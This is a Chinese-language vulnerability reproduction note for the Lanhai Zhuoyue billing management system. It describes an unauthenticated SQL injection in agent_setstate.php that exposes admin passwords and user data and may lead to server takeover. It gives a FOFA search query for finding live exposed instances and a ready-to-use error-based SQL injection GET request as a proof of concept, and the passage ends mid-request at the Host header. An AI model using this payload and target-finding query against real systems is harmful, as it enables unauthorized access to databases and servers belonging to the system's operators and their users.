0x01 產品簡介

藍海卓越計費管理系統是一套以實現網絡運營為基礎，增強全局安全為中心，提高管理效率為目的的網絡安全運營管理系統，提供“高安全、可運營、易管理”的運營管理體驗，基于標準的RADIUS協議開發，它不僅支持PPPOE和WEB認證計費，還支持802.1X接入控制技術，與其他廠商支持相應標準的產品兼容，結合藍海卓越的PPPOE服務器網關，可提供更加豐富的功能。，另外，友好的Web訪問管理的方式，為用戶提供更好用、易用的方式，更貼心的使用形式。

0x02 漏洞概述

藍海卓越計費管理系統 agent_setstate.php 接口存在SQL注入漏洞，未經身份驗證的惡意攻擊者利用 SQL 注入漏洞獲取數據庫中的信息（例如管理員后臺密碼、站點用戶個人信息）之外，攻擊者甚至可以在高權限下向服務器寫入命令，進一步獲取服務器系統權限。

0x03 復現環境

FOFA：title=="藍海卓越計費管理系統"

0x04 漏洞復現

PoC

GET /agent_setstate.php?id=(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT(0x717a767071,(SELECT%20(ELT(6154=6154,1))),0x7170716a71,0x78))s),%208446744073709551610,%208446744073709551610))) HTTP/1.1
Host: your